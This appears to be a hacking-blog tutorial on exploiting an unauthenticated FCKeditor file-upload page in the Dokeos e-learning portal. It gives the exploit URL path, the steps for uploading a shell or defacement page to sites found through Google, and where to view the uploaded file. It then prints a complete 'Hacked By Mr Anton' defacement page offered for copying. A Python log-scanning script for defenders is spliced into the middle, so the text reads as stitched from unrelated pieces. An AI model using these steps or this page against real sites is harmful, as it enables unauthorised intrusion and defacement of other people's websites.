"Portail Dokeos" File Upload vulnerability

by Unknown, at 12.40, 0 comments

Portail Dokeos (the Dokeos e-learning portal) bundles FCKeditor, and its file-manager upload page is exposed as a remote file upload vulnerability: through it a hacker can upload a shell or a defacement page, and you can upload and then view the defacement page or any other file on the website without the admin username and password. OK, straight on to the tutorial..


Now, once you have found a vulnerable site through Google, follow these steps:
  •  Go to: http://your-target/path/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  •  Change ASP to PHP, then click Browse, choose the file you want to upload, then click Upload. You can upload files with the extensions PHP, HTML, JPG and TXT.
  •  To see the uploaded file, go to: http://website/path/main/upload/yourfile
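As an added example (not part of the original post), the following Python script shows how a Dokeos administrator can spot this activity in an Apache access log: it flags hits on the FCKeditor upload test page, POSTs to anything under that upload directory, and .php/.html files being served out of main/upload/, then correlates the events per client. The log lines are constructed, and the php/upload.php connector file name used in the POST line is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format (not from any real server);
# the php/upload.php connector file name in the POST line is an assumption.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2013:12:40:01 +0700] "GET /main/inc/lib/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2013:12:40:09 +0700] "POST /main/inc/lib/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 184 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2013:12:40:15 +0700] "GET /main/upload/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2013:12:41:00 +0700] "GET /main/upload/photo.jpg HTTP/1.1" 200 40210 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2013:12:41:03 +0700] "GET /index.php HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Upload page/connector directory named in the write-up (reachable without login).
FCK_UPLOAD_DIR = "/fckeditor/editor/filemanager/upload/"
# Directory the write-up says uploaded files are served from.
UPLOAD_DIR = "/main/upload/"
# Extensions that execute or render as a page; jpg/txt uploads are not flagged.
DANGEROUS_EXT = (".php", ".phtml", ".html", ".htm")

def classify(method, path):
    """Label one request, or return None if it is not of interest."""
    if FCK_UPLOAD_DIR in path:
        return "upload_attempt" if method == "POST" else "upload_page_probe"
    if path.startswith(UPLOAD_DIR) and path.lower().endswith(DANGEROUS_EXT):
        return "served_uploaded_script"
    return None

def scan_access_log(text):
    """Return (events, suspect_clients): events are (client, timestamp, label, path);
    suspects are clients that POSTed to the connector and also had a .php/.html
    file served from the upload directory."""
    events, per_client = [], defaultdict(set)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        client, ts, method, path, _status = m.groups()
        label = classify(method, path.split("?", 1)[0])
        if label:
            events.append((client, ts, label, path))
            per_client[client].add(label)
    suspects = sorted(c for c, labels in per_client.items()
                      if {"upload_attempt", "served_uploaded_script"} <= labels)
    return events, suspects

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```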




HERE IS MY HTML EXAMPLE, YOU ARE FREE TO COPY AND PASTE IT:

<html><head>

<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Hacked By Mr Anton </title><link rel="SHORTCUT ICON" href="http://images.harianjogja.com/2012/04/anonymous-370x298.jpg">

</head><body bgcolor=black><center>

<br>



<img src="http://muhammadhamdydotcom.files.wordpress.com/2012/02/hackklikteam.jpg" ><br><br>

<a href="http://wwwmranton.blogspot.com/"><object type="application/x-shockwave-flash" width="17"
height="17" data="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/845781339697081.mp3&autoplay=true"><param name="movie" value="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/845781339697081.mp3&song_title=uploadmusic.org&autoplay=true"
/></object></a>

<script language="JavaScript">
/*
An object-oriented Typing Text script, to allow for multiple instances.
A script that causes any text inside any text element to be "typed out", one letter at a time. Note that any HTML tags will not be included in the typed output, to prevent them from causing problems. Tested in Firefox v1.5.0.1, Opera v8.52, Konqueror v3.5.1, and IE v6.
Browsers that do not support this script will simply see the text fully displayed from the start, including any HTML tags.

Functions defined:
TypingText(element, [interval = 100,] [cursor = "",] [finishedCallback = function(){return}]):
Create a new TypingText object around the given element. Optionally
specify a delay between characters of interval milliseconds.
cursor allows users to specify some HTML to be appended to the end of
the string whilst typing. Optionally, can also be a function which
accepts the current text as an argument. This allows the user to
create a "dynamic cursor" which changes depending on the latest character
or the current length of the string.
finishedCallback allows advanced scripters to supply a function
to be executed on finishing. The function must accept no arguments.

TypingText.run():
Run the effect.

static TypingText.runAll():
Run all TypingText-enabled objects on the page.
*/

TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true; // Never run.
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 20 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
return;
}
if(this.currentText == "") this.element.innerHTML = "";
// this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else {
this.currentText += this.origText.charAt(this.currentChar);
}
this.element.innerHTML = this.currentText;
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>

<b><font face="Agency FB" color=red size=4> ========================================================= <br> </font>
<font face="Agency FB" color=white size=3> ++++| YOU HAVE BEEN HACKED |++++ <br> </font>
<font face="Agency FB" color=white size=3> ++++| BY |++++ <br> </font>
<font face="Agency FB" color=white size=3> ++++| Mr.Anton |++++ <br> </font>
<font face="Agency FB" color=red size=4> ========================================================= <br></font></b>
<br>
<font face="Agency FB" color=white size=3>
++++ | THANKS TO |</font><font face="Agency FB" color=red size=3> ALLAH SWT |++++</font><br>
<font face="Agency FB" color=white size=3>
++++ | THANKS TO |</font><font face="Agency FB" color=red size=3> http://wwwmranton.blogspot.com |++++</font><br>
<font face="Agency FB" color=white size=3>
++++ | THANKS TO |</font><font face="Agency FB" color=red size=3> cyber4rt Lampung |++++</font><br>
<font face="Agency FB" color=white size=3>
++++ | THANKS TO |</font><font face="Agency FB" color=red size=3> Hacker Indonesia |++++</font><br>
<br>
<b><font face="Agency FB" color=red size=4> ========================================================= <br> </font></b>
<br>
<br>
<font face="Agency FB" color=white size=15><b>
<marquee width=75%> -| I'm ANTON (Indonesian Hacker)  |-</marquee></b><br></font>

<script type="text/javascript">
// The template calls TypingText on ids "example1" and "example2", which this page
// does not define; guard the lookups so a missing element does not throw.
//Define first typing example:
var ex1 = document.getElementById("example1");
if (ex1) new TypingText(ex1);
//Define second typing example (use "slashing" cursor at the end):
var ex2 = document.getElementById("example2");
if (ex2) new TypingText(ex2, 50, function(i){
var ar = new Array("_"," ","_","_"); return " " + ar[i.length %
ar.length]; });
//Type out examples:
TypingText.runAll();

</script>

<script language="JavaScript" type="text/javascript">

<!--
var rows=1; // must be an odd number
var speed=10; // lower is faster
var reveal=2; // between 0 and 2 only. The higher, the faster the word appears
var effectalign="default" //enter "center" to center it.

/***********************************************
* The Matrix Text Effect- by Richard Womersley (http://www.mf2fm.co.uk/rv)
* This notice must stay intact for use
* Visit http://www.dynamicdrive.com/ for full source code
***********************************************/

var w3c=document.getElementById && !window.opera;
var ie45=document.all && !window.opera;
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
var m_coch=new Array();
var m_copo=new Array();
function matrix() {
if (!w3c && !ie45) return
var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
if (!matrix) return; // no element with id "matrix" on this page, nothing to animate
ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
ma_txt=" "+ma_txt+" ";
columns=ma_txt.length;
if (w3c) {
while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
ma_tab=document.createElement("table");
ma_tab.setAttribute("border", 0);
ma_tab.setAttribute("align", effectalign);
ma_tab.style.backgroundColor="#000000";
ma_bod=document.createElement("tbody");
for (x=0; x<rows; x++) {
ma_row=document.createElement("tr");
for (y=0; y<columns; y++) {
matemp=document.createElement("td");
matemp.setAttribute("id", "Mx"+x+"y"+y);
matemp.className="matrix";
matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
ma_row.appendChild(matemp);
}
ma_bod.appendChild(ma_row);
}
ma_tab.appendChild(ma_bod);
matrix.appendChild(ma_tab);
} else {
ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
for (var x=0; x<rows; x++) {
ma_tab+='<t'+'r>';
for (var y=0; y<columns; y++) {
ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'">&nbsp;</'+'td>';
}
ma_tab+='</'+'tr>';
}
ma_tab+='</'+'table>';
matrix.innerHTML=ma_tab;
}
ma_cho=ma_txt;
for (x=0; x<columns; x++) {
ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
m_copo[x]=0;
}
ma_bod=setInterval("mytricks()", speed);
}

function mytricks() {
x=0;
for (y=0; y<columns; y++) {
x=x+(m_copo[y]==100);
ma_row=m_copo[y]%100;
if (ma_row && m_copo[y]<100) {
if (ma_row<rows+1) {
if (w3c) {
matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
matemp.firstChild.nodeValue=m_coch[y];
}
else {
matemp=document.all["Mx"+(ma_row-1)+"y"+y];
matemp.innerHTML=m_coch[y];
}
matemp.style.color="#33ff66";
matemp.style.fontWeight="bold";
}
if (ma_row>1 && ma_row<rows+2) {
matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
matemp.style.fontWeight="normal";
matemp.style.color="#00ff00";
}
if (ma_row>2) {
matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
matemp.style.color="#009900";
}
if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
else if (ma_row<rows+2) m_copo[y]++;
else if (m_copo[y]<100) m_copo[y]=0;
}
else if (Math.random()>0.9 && m_copo[y]<100) {
m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
m_copo[y]++;
}
}
if (x==columns) clearInterval(ma_bod);
}

function zoomer(ycol) {
var mtmp, mtem, ytmp;
if (m_copo[ycol]==Math.floor(rows/2)+1) {
for (ytmp=0; ytmp<rows; ytmp++) {
if (w3c) {
mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
mtmp.firstChild.nodeValue=m_coch[ycol];
}
else {
mtmp=document.all["Mx"+ytmp+"y"+ycol];
mtmp.innerHTML=m_coch[ycol];
}
mtmp.style.color="#33ff66";
mtmp.style.fontWeight="bold";
}
if (Math.random()<reveal) {
mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
}
if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
m_copo[ycol]+=199;
setTimeout("zoomer("+ycol+")", speed);
}
else if (m_copo[ycol]>200) {
if (w3c) {
mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
}
else {
mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
}
mtmp.style.fontWeight="normal";
mtem.style.fontWeight="normal";
setTimeout("zoomer("+ycol+")", speed);
}
else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
if (m_copo[ycol]>100 && m_copo[ycol]<200) {
if (w3c) {
mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
mtmp.firstChild.nodeValue=String.fromCharCode(160);
mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
mtem.firstChild.nodeValue=String.fromCharCode(160);
}
else {
mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
mtmp.innerHTML=String.fromCharCode(160);
mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
mtem.innerHTML=String.fromCharCode(160);
}
setTimeout("zoomer("+ycol+")", speed);
}

}
// -->
setTimeout('matrix()', 1);

col=0;
var fadeIds=["fade1","fade2","fade3","fade4","fade5","fade6"];
function setFadeColor()
{
// Only touch elements that exist; this page defines none of the fade ids.
for (var i=0; i<fadeIds.length; i++) {
var el=document.getElementById(fadeIds[i]);
if (el) el.style.color="rgb(" + col + ",0,0)";
}
}

function fadein()
{
setFadeColor();
col+=5;
if(col<255) setTimeout('fadein()', 1);
if(col==255) setTimeout('fadeout()', 1);
}

function fadeout()
{
setFadeColor();
col-=5;
if(col>0) setTimeout('fadeout()', 1);
if(col==0) setTimeout('fadein()', 1);
}

// Start the loop only if there is something to fade.
if (document.getElementById(fadeIds[0])) setTimeout('fadein()', 1);
</script>
</center></body></html>


Other sites that have this vulnerability:



The result looks like this:


That's all for now, friends :D (sorry the tutorial is rough), hope it is useful :D

"Portail Dokeos" File Upload vulnerability - written by Unknown, published at 12.40, categorized as Hack, TIPS N TRIK. 0 comments